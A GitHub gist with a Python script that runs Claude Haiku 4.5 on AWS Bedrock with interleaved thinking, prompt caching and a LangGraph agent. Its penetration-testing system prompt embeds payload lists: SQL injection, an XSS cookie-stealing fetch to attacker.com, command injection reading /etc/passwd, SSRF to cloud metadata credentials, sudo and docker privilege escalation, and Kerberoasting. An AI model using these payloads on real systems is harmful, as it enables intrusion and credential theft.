Created
January 9, 2026 15:08
-
-
Save akhil-reni/f28a1ceaeac79a85b2ba8ea22f6e8a01 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Claude Haiku 4.5: Complete AWS Bedrock Implementation | |
| - Interleaved Thinking (with anthropic_beta header) | |
| - Prompt Caching (with cache points for system prompt) | |
| - 200K Context Window | |
| - LangGraph Agent with caching support | |
| Based on: | |
| - https://docs.langchain.com/oss/python/integrations/chat/bedrock#extended-thinking | |
| - https://docs.langchain.com/oss/python/integrations/chat/bedrock#prompt-caching | |
| Interleaved Thinking enables Claude to reason BETWEEN tool calls, not just at the start. | |
| This is critical for multi-step agentic workflows. | |
| """ | |
| import json | |
| import os | |
| import boto3 | |
| from datetime import datetime | |
| from typing import TypedDict, Annotated, Sequence | |
| from dotenv import load_dotenv | |
| from langchain_aws import ChatBedrockConverse | |
| from langchain_core.messages import ( | |
| BaseMessage, | |
| SystemMessage, | |
| HumanMessage, | |
| AIMessage, | |
| ToolMessage | |
| ) | |
| from langgraph.graph import StateGraph, START, END | |
| from langgraph.graph.message import add_messages | |
| from langgraph.prebuilt import ToolNode | |
| load_dotenv("api.env") | |
# ============================================================================
# CONFIGURATION
# ============================================================================
# AWS region hosting the Bedrock runtime endpoint (override via BEDROCK_REGION env var).
BEDROCK_REGION = os.getenv("BEDROCK_REGION", "ap-south-1")
# Bedrock model ID; defaults to the global Claude Haiku 4.5 inference profile.
MODEL = os.getenv("PULSE_LITE_MODEL_NAME", "global.anthropic.claude-haiku-4-5-20251001-v1:0")
# Token budget reserved for the model's internal "thinking" blocks.
THINKING_BUDGET_TOKENS = 10000
# Cap on visible answer tokens; the thinking budget is added on top of this
# when max_tokens is computed for the LLM below.
MAX_OUTPUT_TOKENS = 16000
# JSONL file where per-run token/cache usage entries are appended.
TOKENS_LOG_FILE = "tokens_complete.jsonl"
# ============================================================================
# SYSTEM PROMPT (6000+ tokens for caching)
# ============================================================================
# NOTE(review): the body below is tripled via the trailing `* 3` so the total
# prompt comfortably exceeds the 4,096-token minimum Claude Haiku 4.5 requires
# before a cache point can be placed (see get_cached_system_prompt).
SYSTEM_PROMPT = """You are an elite security penetration testing assistant with deep expertise across all domains of offensive security, vulnerability research, and secure code review.
## CORE COMPETENCIES
### Web Application Security Testing
#### Injection Vulnerabilities
1. **SQL Injection (SQLi)**
- In-band SQLi: UNION-based, Error-based exploitation
- Blind SQLi: Boolean-based, Time-based techniques
- Out-of-band SQLi: DNS exfiltration, HTTP callbacks
- Database-specific techniques: MySQL, PostgreSQL, MSSQL, Oracle
- WAF bypass techniques: Encoding, comments, case variation
2. **Cross-Site Scripting (XSS)**
- Reflected XSS: URL-based, Form-based attacks
- Stored/Persistent XSS: Database storage exploitation
- DOM-based XSS: Client-side JavaScript vulnerabilities
- Content Security Policy (CSP) bypass techniques
3. **Command Injection**
- OS command injection techniques
- Shell metacharacter exploitation
- Blind command injection with time delays
4. **Server-Side Request Forgery (SSRF)**
- Cloud metadata service attacks (AWS, Azure, GCP)
- Internal network scanning via SSRF
- Protocol smuggling (gopher, file, dict)
### Common Vulnerability Patterns
#### SQL Injection Payloads
```sql
-- Authentication Bypass
' OR '1'='1
' OR 1=1--
admin'--
-- UNION-based extraction
' UNION SELECT NULL, username, password FROM users--
-- Boolean-based Blind
' AND 1=1-- (true)
' AND 1=2-- (false)
-- Time-based Blind
'; WAITFOR DELAY '00:00:05'--
' OR IF(1=1, SLEEP(5), 0)--
```
#### XSS Payloads
```javascript
// Basic XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
// Cookie Stealing
<script>fetch('http://attacker.com/log?c='+document.cookie)</script>
// Filter Bypasses
<scr<script>ipt>alert(1)</scr</script>ipt>
```
#### Command Injection
```bash
; ls -la
| whoami
& cat /etc/passwd
`sleep 5`
$(whoami)
```
#### SSRF Payloads
```
# AWS Metadata
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Azure Metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# GCP Metadata
http://metadata.google.internal/computeMetadata/v1/
# Protocol smuggling
gopher://127.0.0.1:6379/_INFO
file:///etc/passwd
```
### Network Security & Infrastructure
- Port scanning and service enumeration
- Network protocol analysis
- Man-in-the-Middle (MitM) attacks
- SSL/TLS vulnerabilities
- Wireless security (WPA/WPA2/WPA3)
### Cloud Security Testing
- AWS: S3, IAM, EC2, Lambda, RDS security
- Azure: AD, Storage, Functions security
- GCP: Cloud Storage, Compute, IAM security
- Container security (Docker, Kubernetes)
### Operating System Security
- Linux privilege escalation (SUID, sudo, kernel exploits)
- Windows privilege escalation (unquoted paths, DLL hijacking)
- Active Directory attacks (Kerberoasting, AS-REP, DCSync)
### Testing Methodologies
#### OWASP Top 10 (2021)
1. Broken Access Control
2. Cryptographic Failures
3. Injection
4. Insecure Design
5. Security Misconfiguration
6. Vulnerable and Outdated Components
7. Authentication Failures
8. Data Integrity Failures
9. Logging Failures
10. SSRF
#### PTES (Penetration Testing Execution Standard)
1. Pre-engagement
2. Intelligence Gathering
3. Threat Modeling
4. Vulnerability Analysis
5. Exploitation
6. Post Exploitation
7. Reporting
### Tool Expertise
- **Web**: Burp Suite, OWASP ZAP, Nikto, SQLMap
- **Network**: Nmap, Masscan, Wireshark
- **Exploitation**: Metasploit, Empire
- **Password**: John the Ripper, Hashcat, Hydra
- **Post-Exploitation**: Mimikatz, BloodHound
### Response Guidelines
1. **Technically Precise**: Use accurate terminology
2. **Practical**: Include working examples
3. **Comprehensive**: Cover attack and defense
4. **Ethical**: Emphasize authorized testing
5. **Evidence-Based**: Reference CVEs, CWEs
6. **Remediation-Focused**: Always include mitigation
### Privilege Escalation Examples
#### Linux
```bash
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Sudo misconfiguration
sudo -l
sudo -u#-1 /bin/bash
# Docker escape
docker run -v /:/mnt -it alpine chroot /mnt sh
```
#### Windows
```powershell
# Check privileges
whoami /priv
# Unquoted service paths
wmic service get name,pathname,startmode | findstr /i "auto"
```
#### Active Directory
```powershell
# Kerberoasting
Get-ADUser -Filter {ServicePrincipalName -ne "$null"}
Rubeus.exe kerberoast
# AS-REP Roasting
Rubeus.exe asreproast
# BloodHound
SharpHound.exe -c All
```
### Remediation Strategies
#### Input Validation
- Whitelist allowed characters
- Implement strict length limits
- Use regex for structured data
- Reject dangerous metacharacters
#### Output Encoding
- HTML entity encoding
- JavaScript encoding
- URL encoding
- SQL escaping
#### Secure Configurations
- Disable unnecessary services
- Remove default credentials
- Implement least privilege
- Enable security headers (CSP, HSTS)
- Network segmentation
#### Authentication & Authorization
- Implement MFA
- Strong password policies
- Account lockout policies
- Secure session management
- Proper RBAC
#### Secure Coding
- Parameterized queries
- Proper error handling
- Avoid dynamic code execution
- Security linters and SAST
- Regular code reviews
""" * 3  # triple the body so the cached prefix clears the 4,096-token minimum
# ============================================================================
# BEDROCK CLIENT WITH INTERLEAVED THINKING
# ============================================================================
# Shared boto3 runtime client reused by the LLM below. Credentials come from
# the default AWS provider chain (env vars / profile / role; api.env is
# loaded via load_dotenv above).
bedrock_client = boto3.client(
    service_name="bedrock-runtime",
    region_name=BEDROCK_REGION,
)
print(f"β Bedrock client created in {BEDROCK_REGION}")
| # ============================================================================ | |
| # SYSTEM PROMPT WITH CACHE POINT (must be defined before LLM) | |
| # ============================================================================ | |
def get_cached_system_prompt() -> list:
    """
    Build the Converse-API system prompt followed by a cache point.

    Claude Haiku 4.5 requires a minimum of 4,096 tokens ahead of a cache
    point; the SYSTEM_PROMPT used here is well above that threshold
    (~6,000 tokens).

    Returns:
        list: one text block plus a default cache-point marker.
    """
    cache_marker = {"cachePoint": {"type": "default"}}
    return [{"text": SYSTEM_PROMPT}, cache_marker]
# LLM with Interleaved Thinking + Prompt Caching
# Based on: https://docs.langchain.com/oss/python/integrations/chat/bedrock#extended-thinking
llm = ChatBedrockConverse(
    model=MODEL,
    region_name=BEDROCK_REGION,
    client=bedrock_client,
    # Sum of answer cap and thinking budget — presumably because the thinking
    # budget counts against max_tokens, leaving MAX_OUTPUT_TOKENS of visible
    # output. NOTE(review): confirm against current Anthropic/Bedrock docs.
    max_tokens=MAX_OUTPUT_TOKENS + THINKING_BUDGET_TOKENS,
    # NOTE(review): looks like temperature must be 1 when extended thinking
    # is enabled — verify before changing this value.
    temperature=1,
    # System prompt with cache point for prompt caching
    system=get_cached_system_prompt(),
    # Interleaved thinking configuration (CRITICAL for multi-tool workflows)
    additional_model_request_fields={
        "anthropic_beta": ["interleaved-thinking-2025-05-14"],  # Required for interleaved thinking
        "thinking": {
            "type": "enabled",
            "budget_tokens": THINKING_BUDGET_TOKENS,
        }
    },
)
print(f"β LLM configured: {MODEL}")
print(f" - Interleaved thinking: ENABLED (anthropic_beta: interleaved-thinking-2025-05-14)")
print(f" - Thinking budget: {THINKING_BUDGET_TOKENS} tokens")
print(f" - Max output: {MAX_OUTPUT_TOKENS} tokens")
print(f" - Prompt caching: ENABLED (system prompt cached)")
print(f" - This enables thinking BETWEEN tool calls for multi-step reasoning\n")
# ============================================================================
# AGENT STATE WITH CACHING SUPPORT
# ============================================================================
class AgentState(TypedDict):
    """LangGraph state: accumulated conversation plus a step budget."""
    # Conversation so far; `add_messages` makes graph updates append to the
    # list instead of replacing it.
    messages: Annotated[Sequence[BaseMessage], add_messages]
    # Step budget supplied by run() (set to 10 there).
    # NOTE(review): nothing in this graph visibly decrements or reads it —
    # confirm whether LangGraph consumes it internally.
    remaining_steps: int
| # ============================================================================ | |
| # MESSAGE BUILDER WITH CACHE POINTS | |
| # ============================================================================ | |
def build_messages_with_cache_point(messages: list[BaseMessage]) -> list:
    """
    Convert LangChain messages to Bedrock Converse format, inserting a
    cache point so everything up to (but excluding) the latest user query
    can be served from the prompt cache.

    Cache point strategy:
    1. System prompt (static) - cached separately via the LLM's `system` kwarg
    2. Conversation history - cached up to the second-to-last message
    3. Latest user message - not cached (changes every time)
    Based on: https://docs.langchain.com/oss/python/integrations/chat/bedrock#prompt-caching

    Args:
        messages: LangChain message objects (System/Human/AI/Tool).

    Returns:
        list: Converse-style {"role": ..., "content": ...} dicts.
    """
    formatted_messages = []
    for i, msg in enumerate(messages):
        if isinstance(msg, SystemMessage):
            # System prompt is passed separately on the LLM; skip it here.
            continue
        # FIX: tool results must be sent with role "user" in the Converse
        # API; the previous version mapped ToolMessage to "assistant".
        if isinstance(msg, (HumanMessage, ToolMessage)):
            role = "user"
        else:
            role = "assistant"
        # Place the cache point on the second-to-last message so that the
        # entire history except the newest user query gets cached.
        is_cache_point = (i == len(messages) - 2 and
                          isinstance(messages[-1], HumanMessage))
        if is_cache_point:
            # FIX: msg.content may already be a list of content blocks;
            # only wrap plain strings in a text block before appending
            # the cache-point marker.
            if isinstance(msg.content, str):
                content = [{"type": "text", "text": msg.content}]
            else:
                content = list(msg.content)
            content.append({"cachePoint": {"type": "default"}})
            formatted_messages.append({"role": role, "content": content})
        else:
            formatted_messages.append({"role": role, "content": msg.content})
    return formatted_messages
| # ============================================================================ | |
| # TOKEN TRACKING | |
| # ============================================================================ | |
def log_tokens(response, run_number: int, query: str):
    """
    Extract token usage (including prompt-cache metrics) from a response
    and append it as one JSON line to TOKENS_LOG_FILE.

    Args:
        response: message object carrying `usage_metadata` (may be absent
            or None on some messages).
        run_number: sequential run counter for correlating log entries.
        query: the user query; truncated to 100 chars in the log entry.

    Returns:
        dict: the entry that was written.
    """
    # FIX: `usage_metadata` can exist but be None, in which case the old
    # `getattr(..., {})` fallback never triggered and `.get` raised
    # AttributeError; `or {}` guards both cases. Same for the details dict.
    usage = getattr(response, "usage_metadata", None) or {}
    input_details = usage.get("input_token_details") or {}
    entry = {
        "timestamp": datetime.now().isoformat(),
        "run": run_number,
        "query": query[:100],
        "input_tokens": usage.get("input_tokens", 0),
        "output_tokens": usage.get("output_tokens", 0),
        "total_tokens": usage.get("total_tokens", 0),
        "cache_read": input_details.get("cache_read", 0),
        "cache_creation": input_details.get("cache_creation", 0),
    }
    # Append-only JSONL so repeated runs accumulate a usage history.
    with open(TOKENS_LOG_FILE, "a") as f:
        f.write(json.dumps(entry) + "\n")
    return entry
def display_token_usage(tokens: dict):
    """Pretty-print token counts plus any prompt-cache activity."""
    print(f"\nπ TOKEN USAGE:")
    print(f" Input: {tokens['input_tokens']:,}")
    print(f" Output: {tokens['output_tokens']:,}")
    print(f" Total: {tokens['total_tokens']:,}")
    reads = tokens.get('cache_read', 0)
    writes = tokens.get('cache_creation', 0)
    if reads > 0:
        # Cached input tokens are billed at ~10% of the normal rate.
        saved = int(reads * 0.9)
        print(f" π Cache Read: {reads:,} tokens (~{saved:,} tokens saved!)")
    if writes > 0:
        print(f" πΎ Cache Write: {writes:,} tokens (cached for 5 min)")
    if not reads and not writes:
        print(f" βͺ Cache: Not used")
| # ============================================================================ | |
| # THINKING PARSER | |
| # ============================================================================ | |
def parse_thinking_blocks(ai_message):
    """
    Split a model response into its reasoning ("thinking") text and its
    plain answer text.

    Returns:
        dict with keys:
            "thinking": joined reasoning text, or None when there was none.
            "content":  joined text blocks, or the raw message content when
                        no text blocks were present.
    """
    thinking_parts: list = []
    answer_parts: list = []
    for block in getattr(ai_message, "content_blocks", []):
        if not isinstance(block, dict):
            continue
        kind = block.get("type")
        if kind == "reasoning":
            thinking_parts.append(block.get("reasoning", ""))
        elif kind == "text":
            answer_parts.append(block.get("text", ""))
    return {
        "thinking": "\n".join(thinking_parts) if thinking_parts else None,
        "content": "\n".join(answer_parts) if answer_parts else ai_message.content,
    }
| # ============================================================================ | |
| # AGENT GRAPH WITH CACHING | |
| # ============================================================================ | |
# Tools (add your security testing tools here).
# Left empty: with no tools, the graph built below is a single agent node.
tools = []
| # Create agent graph manually to control message formatting | |
def call_model(state: AgentState):
    """Invoke the LLM on the current message history.

    The system prompt (with its cache point) is already baked into the
    module-level `llm`, so only the conversation messages are forwarded.
    """
    response = llm.invoke(state["messages"])
    return {"messages": [response]}
# Build graph: a single "agent" node, with an optional tool-execution loop.
workflow = StateGraph(AgentState)
workflow.add_node("agent", call_model)
# Add conditional edges if using tools
if tools:
    tool_node = ToolNode(tools)
    workflow.add_node("tools", tool_node)
    def should_continue(state: AgentState):
        """Route to the tool node while the last AI message has pending tool calls."""
        last_message = state["messages"][-1]
        if hasattr(last_message, "tool_calls") and last_message.tool_calls:
            return "tools"
        return END
    # agent -> tools while tool calls are pending, otherwise finish.
    workflow.add_conditional_edges("agent", should_continue, {"tools": "tools", END: END})
    # After tools execute, return their results to the agent for more reasoning.
    workflow.add_edge("tools", "agent")
else:
    # No tools configured: the agent answers in a single hop.
    workflow.add_edge("agent", END)
workflow.add_edge(START, "agent")
agent = workflow.compile()
print("β Agent created with caching support\n")
# ============================================================================
# RUN FUNCTION
# ============================================================================
# Module-level history so successive run() calls share one multi-turn chat.
conversation_history = []
def run(query: str, run_number: int = 1):
    """Execute one agent turn (caching + interleaved thinking) and print
    token usage, a thinking excerpt, and the (truncated) response.

    Args:
        query: the user's question for this turn.
        run_number: label used in the banner and token log.

    Returns:
        The final AI message content, or None when no message came back.
    """
    banner = '=' * 80
    print(f"\n{banner}")
    print(f"RUN #{run_number}: {query}")
    print(banner)

    # Extend the shared multi-turn history with this user query.
    conversation_history.append(HumanMessage(content=query))

    result = agent.invoke({
        "messages": conversation_history,
        "remaining_steps": 10
    })

    if not result["messages"]:
        return None

    last = result["messages"][-1]
    conversation_history.append(last)

    # Record and show token/cache usage for this turn.
    display_token_usage(log_tokens(last, run_number, query))

    parsed = parse_thinking_blocks(last)
    if parsed["thinking"]:
        print(f"\nπ THINKING (first 200 chars):")
        print(f" {parsed['thinking'][:200]}...")

    print(f"\nπ RESPONSE:")
    content = parsed['content']
    if len(content) > 500:
        print(f" {content[:500]}...")
    else:
        print(f" {content}")
    return last.content
| # ============================================================================ | |
| # MAIN | |
| # ============================================================================ | |
if __name__ == "__main__":
    banner = "=" * 80
    print("\n" + banner)
    print("Claude Haiku 4.5: AWS Bedrock Implementation")
    print("Interleaved Thinking + Prompt Caching + Agent")
    print(banner + "\n")

    # Run 1 writes the system prompt to cache; runs 2-3 should read the
    # system prompt (and growing conversation prefix) back from cache.
    queries = [
        "Explain SQL injection in 2 sentences",
        "Explain XSS in 2 sentences",
        "What's the difference between reflected and stored XSS?",
    ]
    for run_number, query in enumerate(queries, start=1):
        run(query, run_number)

    print("\n" + banner)
    print(f"β Test complete! Check {TOKENS_LOG_FILE} for token usage.")
    print(banner + "\n")
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment